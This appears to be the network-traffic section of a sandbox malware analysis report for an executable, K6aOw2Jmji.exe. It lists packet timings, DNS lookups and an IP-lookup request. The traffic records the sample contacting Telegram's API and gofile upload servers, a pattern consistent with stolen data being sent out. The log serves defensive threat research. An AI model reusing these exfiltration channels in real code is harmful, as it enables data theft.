                                                                                                                                                            Nov 29, 2024 12:28:26.613260984 CET44349734185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:26.613358021 CET49734443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:26.613912106 CET49735443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:26.613941908 CET44349735185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:26.613989115 CET49735443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:26.614409924 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:26.614442110 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:26.614818096 CET49734443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:26.614830971 CET44349734185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:26.615015984 CET49735443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:26.615031958 CET44349735185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:26.615236044 CET49732443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:26.615248919 CET44349732185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:26.615319967 CET49732443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:26.615552902 CET49732443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:26.615566015 CET44349732185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:26.616554022 CET49731443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:26.616584063 CET44349731185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:26.616600990 CET49733443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:26.616622925 CET44349733185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:26.616645098 CET49731443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:26.616661072 CET49733443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:26.616938114 CET49731443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:26.616952896 CET44349731185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:26.617296934 CET49733443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:26.617311954 CET44349733185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.829683065 CET44349732185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.829755068 CET49732443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.832093000 CET44349731185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.832304955 CET49731443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.834428072 CET49732443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.834439039 CET44349732185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.834482908 CET49731443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.834491014 CET44349731185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.834702969 CET44349731185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.834903955 CET44349732185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.870299101 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.870368958 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.872067928 CET44349735185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.872129917 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.872143030 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.872168064 CET49735443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.872561932 CET44349733185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.872665882 CET49733443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.872848988 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.874351978 CET49733443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.874360085 CET44349733185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.874584913 CET44349733185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.875751019 CET49735443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.875756025 CET44349735185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.876368999 CET44349735185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.884000063 CET49732443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.884001970 CET49731443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.892761946 CET49733443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.892831087 CET49732443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.893018961 CET49731443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.893184900 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.893812895 CET49735443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.916043997 CET44349734185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.916146994 CET49734443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.917907953 CET49734443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.917918921 CET44349734185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.918212891 CET44349734185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.919209957 CET49734443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:27.935329914 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.935332060 CET44349731185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.935332060 CET44349735185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.935344934 CET44349732185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.935348034 CET44349733185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:27.963332891 CET44349734185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.257160902 CET44349732185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.257227898 CET44349732185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.257273912 CET44349732185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.257283926 CET49732443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:28.257309914 CET44349732185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.257332087 CET44349732185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.257350922 CET49732443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:28.257378101 CET49732443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:28.265031099 CET44349731185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.265130043 CET44349731185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.265180111 CET49731443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:28.269943953 CET49732443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:28.269946098 CET49731443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:28.313189983 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.313278913 CET44349730185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.313325882 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:28.314011097 CET44349735185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.314119101 CET44349735185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.314225912 CET49735443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:28.314521074 CET49735443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:28.314872026 CET49730443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:28.316360950 CET44349733185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.316545963 CET44349733185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.316617966 CET49733443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:28.316778898 CET49733443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:28.367793083 CET44349734185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.367861986 CET44349734185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.367901087 CET44349734185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.367975950 CET44349734185.199.108.133192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.367997885 CET49734443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:28.368047953 CET49734443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:28.369272947 CET49734443192.168.2.4185.199.108.133
                                                                                                                                                            Nov 29, 2024 12:28:28.833518982 CET49736443192.168.2.4149.154.167.220
                                                                                                                                                            Nov 29, 2024 12:28:28.833564997 CET44349736149.154.167.220192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.833631992 CET49736443192.168.2.4149.154.167.220
                                                                                                                                                            Nov 29, 2024 12:28:28.833967924 CET49736443192.168.2.4149.154.167.220
                                                                                                                                                            Nov 29, 2024 12:28:28.833981991 CET44349736149.154.167.220192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:30.247205973 CET44349736149.154.167.220192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:30.247294903 CET49736443192.168.2.4149.154.167.220
                                                                                                                                                            Nov 29, 2024 12:28:30.261163950 CET49736443192.168.2.4149.154.167.220
                                                                                                                                                            Nov 29, 2024 12:28:30.261204004 CET44349736149.154.167.220192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:30.261527061 CET44349736149.154.167.220192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:30.269284964 CET49736443192.168.2.4149.154.167.220
                                                                                                                                                            Nov 29, 2024 12:28:30.315332890 CET44349736149.154.167.220192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:30.762681007 CET44349736149.154.167.220192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:30.762749910 CET44349736149.154.167.220192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:30.762825012 CET49736443192.168.2.4149.154.167.220
                                                                                                                                                            Nov 29, 2024 12:28:30.763564110 CET49736443192.168.2.4149.154.167.220
                                                                                                                                                            Nov 29, 2024 12:28:31.446893930 CET4973780192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:31.566946030 CET8049737104.16.185.241192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:31.567471027 CET4973780192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:31.567912102 CET4973780192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:31.687912941 CET8049737104.16.185.241192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:32.753259897 CET8049737104.16.185.241192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:32.806730032 CET4973780192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:32.819849014 CET4973780192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:32.940220118 CET8049737104.16.185.241192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:32.943881035 CET4973780192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:34.292552948 CET4973880192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:34.413655996 CET8049738104.16.185.241192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:34.413975000 CET4973880192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:34.414151907 CET4973880192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:34.534512043 CET8049738104.16.185.241192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:34.702339888 CET49739443192.168.2.445.112.123.126
                                                                                                                                                            Nov 29, 2024 12:28:34.702387094 CET4434973945.112.123.126192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:34.702677965 CET49739443192.168.2.445.112.123.126
                                                                                                                                                            Nov 29, 2024 12:28:34.703071117 CET49739443192.168.2.445.112.123.126
                                                                                                                                                            Nov 29, 2024 12:28:34.703099966 CET4434973945.112.123.126192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:35.551759958 CET8049738104.16.185.241192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:35.552128077 CET4973880192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:35.672739983 CET8049738104.16.185.241192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:35.672812939 CET4973880192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:36.124805927 CET4434973945.112.123.126192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:36.124897003 CET49739443192.168.2.445.112.123.126
                                                                                                                                                            Nov 29, 2024 12:28:36.128623962 CET49739443192.168.2.445.112.123.126
                                                                                                                                                            Nov 29, 2024 12:28:36.128638029 CET4434973945.112.123.126192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:36.128956079 CET4434973945.112.123.126192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:36.135704994 CET49739443192.168.2.445.112.123.126
                                                                                                                                                            Nov 29, 2024 12:28:36.179336071 CET4434973945.112.123.126192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:36.646615982 CET4434973945.112.123.126192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:36.646699905 CET4434973945.112.123.126192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:36.646846056 CET49739443192.168.2.445.112.123.126
                                                                                                                                                            Nov 29, 2024 12:28:36.647677898 CET49739443192.168.2.445.112.123.126
                                                                                                                                                            Nov 29, 2024 12:28:37.092710018 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:37.092737913 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:37.092941999 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:37.093343019 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:37.093350887 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.576895952 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.576967955 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.579416037 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.579425097 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.579855919 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.580852032 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.627332926 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.953963995 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.953980923 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.954814911 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.954819918 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.956232071 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.956243992 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.956420898 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.956425905 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.956547022 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.956554890 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.956625938 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.956634045 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.956727982 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.956732988 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.956813097 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.956818104 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.956873894 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.956880093 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957041979 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957041979 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957051992 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957065105 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957115889 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957120895 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957180977 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957187891 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957237959 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957245111 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957297087 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957303047 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957345963 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957350969 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957422972 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957431078 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957513094 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957520008 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957602024 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957607985 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957654953 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957659960 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957731962 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957736969 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957844019 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957854033 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957935095 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957942009 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.958014011 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.958019018 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.958059072 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.958065033 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.958118916 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.958132982 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.958204985 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.958210945 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.958291054 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.958296061 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.958384991 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.958391905 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.958452940 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.958462000 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.958503008 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.958508015 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.958801031 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.958833933 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:39.241112947 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:39.290234089 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:40.289835930 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:40.289921045 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:40.289973974 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:40.295582056 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Nov 29, 2024 12:28:26.433357000 CET6060653192.168.2.41.1.1.1
                                                                                                                                                            Nov 29, 2024 12:28:26.574143887 CET53606061.1.1.1192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.459835052 CET5874653192.168.2.41.1.1.1
                                                                                                                                                            Nov 29, 2024 12:28:28.600526094 CET53587461.1.1.1192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:28.691040039 CET4951153192.168.2.41.1.1.1
                                                                                                                                                            Nov 29, 2024 12:28:28.831883907 CET53495111.1.1.1192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:31.301743031 CET5184753192.168.2.41.1.1.1
                                                                                                                                                            Nov 29, 2024 12:28:31.446046114 CET53518471.1.1.1192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:32.853327036 CET6279453192.168.2.41.1.1.1
                                                                                                                                                            Nov 29, 2024 12:28:32.993607998 CET53627941.1.1.1192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:34.560918093 CET5520953192.168.2.41.1.1.1
                                                                                                                                                            Nov 29, 2024 12:28:34.701533079 CET53552091.1.1.1192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:36.952281952 CET5632353192.168.2.41.1.1.1
                                                                                                                                                            Nov 29, 2024 12:28:37.091887951 CET53563231.1.1.1192.168.2.4
                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                            Nov 29, 2024 12:28:26.433357000 CET192.168.2.41.1.1.10xe0eaStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 29, 2024 12:28:28.459835052 CET192.168.2.41.1.1.10x90e4Standard query (0)54.229.13.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                            Nov 29, 2024 12:28:28.691040039 CET192.168.2.41.1.1.10x5ae7Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 29, 2024 12:28:31.301743031 CET192.168.2.41.1.1.10x291eStandard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 29, 2024 12:28:32.853327036 CET192.168.2.41.1.1.10x2cc7Standard query (0)54.229.13.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                            Nov 29, 2024 12:28:34.560918093 CET192.168.2.41.1.1.10xd302Standard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 29, 2024 12:28:36.952281952 CET192.168.2.41.1.1.10x6fe9Standard query (0)store5.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                            Nov 29, 2024 12:28:26.574143887 CET1.1.1.1192.168.2.40xe0eaNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 29, 2024 12:28:26.574143887 CET1.1.1.1192.168.2.40xe0eaNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 29, 2024 12:28:26.574143887 CET1.1.1.1192.168.2.40xe0eaNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 29, 2024 12:28:26.574143887 CET1.1.1.1192.168.2.40xe0eaNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 29, 2024 12:28:28.600526094 CET1.1.1.1192.168.2.40x90e4Name error (3)54.229.13.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                            Nov 29, 2024 12:28:28.831883907 CET1.1.1.1192.168.2.40x5ae7No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 29, 2024 12:28:31.446046114 CET1.1.1.1192.168.2.40x291eNo error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 29, 2024 12:28:31.446046114 CET1.1.1.1192.168.2.40x291eNo error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 29, 2024 12:28:32.993607998 CET1.1.1.1192.168.2.40x2cc7Name error (3)54.229.13.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                            Nov 29, 2024 12:28:34.701533079 CET1.1.1.1192.168.2.40xd302No error (0)api.gofile.io45.112.123.126A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 29, 2024 12:28:37.091887951 CET1.1.1.1192.168.2.40x6fe9No error (0)store5.gofile.io31.14.70.244A (IP address)IN (0x0001)false
                                                                                                                                                            • raw.githubusercontent.com
                                                                                                                                                            • api.telegram.org
                                                                                                                                                            • api.gofile.io
                                                                                                                                                            • store5.gofile.io
                                                                                                                                                            • icanhazip.com
                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            0192.168.2.449737104.16.185.241806400C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 29, 2024 12:28:31.567912102 CET63OUTGET / HTTP/1.1
                                                                                                                                                            Host: icanhazip.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Nov 29, 2024 12:28:32.753259897 CET535INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:32 GMT
                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                            Content-Length: 13
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Allow-Methods: GET
                                                                                                                                                            Set-Cookie: __cf_bm=v9d1hAw_nh0Pl2DAgbahnJ3kQUJjogJVFHQ0DKdpXjc-1732879712-1.0.1.1-Ig21JR8bkIlzTtgr_Ttp0JNGHkFydJI5rRW2ZyBlyWyAybirSAuim5y60yw5jwxxkMG1sLD_o4E3OGbylrQ7gA; path=/; expires=Fri, 29-Nov-24 11:58:32 GMT; domain=.icanhazip.com; HttpOnly
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8ea2413b9f924385-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a
                                                                                                                                                            Data Ascii: 8.46.123.228


